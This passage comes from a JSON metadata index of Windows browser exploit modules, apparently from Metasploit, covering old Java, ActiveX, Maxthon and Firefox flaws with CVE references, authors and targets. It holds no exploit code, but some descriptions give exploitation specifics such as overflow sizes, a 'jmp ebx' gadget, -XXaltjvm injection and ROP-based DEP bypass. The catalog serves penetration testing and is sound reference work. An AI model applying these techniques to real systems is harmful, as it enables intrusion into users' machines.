"path": "/modules/exploits/windows/browser/java_cmm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_cmm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_codebase_trust": {
"name": "Sun Java Applet2ClassLoader Remote Code Execution",
"full_name": "exploit/windows/browser/java_codebase_trust",
"rank": 600,
"disclosure_date": "2011-02-15",
"type": "exploit",
"author": [
"Frederic Hoguin",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.",
"references": [
"CVE-2010-4452",
"OSVDB-71193",
"ZDI-11-084",
"URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/",
"URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html"
],
"platform": "Java",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_codebase_trust.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_codebase_trust",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_docbase_bof": {
"name": "Sun Java Runtime New Plugin docbase Buffer Overflow",
"full_name": "exploit/windows/browser/java_docbase_bof",
"rank": 500,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.",
"references": [
"CVE-2010-3552",
"OSVDB-68873",
"BID-44023",
"URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html",
"ZDI-10-206",
"URL-http://code.google.com/p/skylined/issues/detail?id=23",
"URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal (msvcr71.dll ROP)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_docbase_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_docbase_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_mixer_sequencer": {
"name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
"full_name": "exploit/windows/browser/java_mixer_sequencer",
"rank": 500,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Peter Vreugdenhil",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.",
"references": [
"CVE-2010-0842",
"OSVDB-63493",
"BID-39077",
"ZDI-10-060",
"URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows / Java 6 <=u18"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_mixer_sequencer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_arginject_altjvm": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"full_name": "exploit/windows/browser/java_ws_arginject_altjvm",
"rank": 600,
"disclosure_date": "2010-04-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2010-0886",
"CVE-2010-1423",
"OSVDB-63648",
"BID-39346",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_arginject_altjvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_double_quote": {
"name": "Sun Java Web Start Double Quote Injection",
"full_name": "exploit/windows/browser/java_ws_double_quote",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Rh0 <rh0@z1p.biz>"
],
"description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.",
"references": [
"CVE-2012-1533",
"OSVDB-86348",
"BID-56046",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-http://pastebin.com/eUucVage "
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/java_ws_double_quote.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_double_quote",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_vmargs": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"full_name": "exploit/windows/browser/java_ws_vmargs",
"rank": 600,
"disclosure_date": "2012-02-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2012-0500",
"OSVDB-79227",
"BID-52015",
"URL-https://seclists.org/fulldisclosure/2012/Feb/251",
"URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/java_ws_vmargs.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_vmargs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/juniper_sslvpn_ive_setupdll": {
"name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/juniper_sslvpn_ive_setupdll",
"rank": 300,
"disclosure_date": "2006-04-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.",
"references": [
"CVE-2006-2086",
"OSVDB-25001",
"BID-17712",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English",
"Debugging"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb",
"is_install_path": true,
"ref_name": "windows/browser/juniper_sslvpn_ive_setupdll",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/kazaa_altnet_heap": {
"name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/kazaa_altnet_heap",
"rank": 300,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-5217",
"OSVDB-37785",
"URL-http://secunia.com/advisories/26970/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0SP1 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb",
"is_install_path": true,
"ref_name": "windows/browser/kazaa_altnet_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/keyhelp_launchtripane_exec": {
"name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",
"full_name": "exploit/windows/browser/keyhelp_launchtripane_exec",
"rank": 600,
"disclosure_date": "2012-06-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3",
"references": [
"CVE-2012-2516",
"OSVDB-83311",
"BID-55265",
"ZDI-12-169",
"URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/keyhelp_launchtripane_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/logitechvideocall_start": {
"name": "Logitech VideoCall ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/logitechvideocall_start",
"rank": 300,
"disclosure_date": "2007-05-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-2918",
"OSVDB-36820",
"BID-24254"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP2 English"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/logitechvideocall_start.rb",
"is_install_path": true,
"ref_name": "windows/browser/logitechvideocall_start",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/lpviewer_url": {
"name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/lpviewer_url",
"rank": 300,
"disclosure_date": "2008-10-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-4384",
"OSVDB-48946",
"US-CERT-VU-848873",
"BID-31604"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/lpviewer_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/lpviewer_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/macrovision_downloadandexecute": {
"name": "Macrovision InstallShield Update Service Buffer Overflow",
"full_name": "exploit/windows/browser/macrovision_downloadandexecute",
"rank": 300,
"disclosure_date": "2007-10-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5660",
"OSVDB-38347"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_downloadandexecute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/macrovision_unsafe": {
"name": "Macrovision InstallShield Update Service ActiveX Unsafe Method",
"full_name": "exploit/windows/browser/macrovision_unsafe",
"rank": 600,
"disclosure_date": "2007-10-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.",
"references": [
"CVE-2007-5660",
"OSVDB-38347",
"BID-26280"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/macrovision_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/malwarebytes_update_exec": {
"name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution",
"full_name": "exploit/windows/browser/malwarebytes_update_exec",
"rank": 400,
"disclosure_date": "2014-12-16",
"type": "exploit",
"author": [
"Yonathan Klijnsma",
"Gabor Seljan",
"todb <todb@metasploit.com>"
],
"description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
"references": [
"CVE-2014-4936",
" OSVDB-116050",
"URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/malwarebytes_update_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/maxthon_history_xcs": {
"name": "Maxthon3 about:history XCS Trusted Zone Code Execution",
"full_name": "exploit/windows/browser/maxthon_history_xcs",
"rank": 600,
"disclosure_date": "2012-11-26",
"type": "exploit",
"author": [
"Roberto Suggi Liverani",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
"references": [
"OSVDB-88191",
"EDB-23225",
"URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Maxthon 3 (prior to 3.3) on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb",
"is_install_path": true,
"ref_name": "windows/browser/maxthon_history_xcs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafee_mcsubmgr_vsprintf": {
"name": "McAfee Subscription Manager Stack Buffer Overflow",
"full_name": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf",
"rank": 300,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.",
"references": [
"CVE-2006-3961",
"OSVDB-27698",
"BID-19265"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafee_mvt_exec": {
"name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
"full_name": "exploit/windows/browser/mcafee_mvt_exec",
"rank": 600,
"disclosure_date": "2012-04-30",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.",
"references": [
"CVE-2012-4598",
"OSVDB-81657",
"EDB-18805",
"URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mvt_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafeevisualtrace_tracetarget": {
"name": "McAfee Visual Trace ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/mcafeevisualtrace_tracetarget",
"rank": 300,
"disclosure_date": "2007-07-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2006-6707",
"OSVDB-32399",
"URL-http://secunia.com/advisories/23463"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP2 English"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafeevisualtrace_tracetarget",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mirc_irc_url": {
"name": "mIRC IRC URL Buffer Overflow",
"full_name": "exploit/windows/browser/mirc_irc_url",
"rank": 300,
"disclosure_date": "2003-10-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.",
"references": [
"CVE-2003-1336",
"OSVDB-2665",
"BID-8819"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mirc_irc_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/mirc_irc_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_attribchildremoved": {
"name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free",
"full_name": "exploit/windows/browser/mozilla_attribchildremoved",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"regenrecht",
"Lincoln <lincoln@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.",
"references": [
"CVE-2011-3659",
"OSVDB-78736",
"ZDI-12-110",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP - Firefox 8 / 8.0.1",
"Windows XP - Firefox 9",
"Windows XP - Firefox 9.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_attribchildremoved",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_firefox_onreadystatechange": {
"name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free",
"full_name": "exploit/windows/browser/mozilla_firefox_onreadystatechange",
"rank": 300,
"disclosure_date": "2013-06-25",
"type": "exploit",
"author": [
"Nils",
"Unknown",
"w3bd3vil",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.",
"references": [
"CVE-2013-1690",
"OSVDB-94584",
"BID-60778",
"URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html",
"URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365",
"URL-http://krash.in/ffn0day.txt",
"URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 17 & Firefox 21 / Windows XP SP3"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_onreadystatechange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_firefox_xmlserializer": {
"name": "Firefox XMLSerializer Use After Free",
"full_name": "exploit/windows/browser/mozilla_firefox_xmlserializer",
"rank": 300,
"disclosure_date": "2013-01-08",
"type": "exploit",
"author": [
"regenrecht",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.",
"references": [
"CVE-2013-0753",
"OSVDB-89021",
"BID-57209",
"ZDI-13-006",
"URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 17 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_xmlserializer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_interleaved_write": {
"name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption",
"full_name": "exploit/windows/browser/mozilla_interleaved_write",
"rank": 300,
"disclosure_date": "2010-10-25",
"type": "exploit",
"author": [
"unknown",
"scriptjunkie"
],
"description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.",
"references": [
"CVE-2010-3765",
"OSVDB-68905",
"BID-15352",
"EDB-15352",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222",
"URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_interleaved_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_mchannel": {
"name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/mozilla_mchannel",
"rank": 300,
"disclosure_date": "2011-05-10",
"type": "exploit",
"author": [
"regenrecht",
"Rh0",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.",
"references": [
"CVE-2011-0065",
"OSVDB-72085",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986",
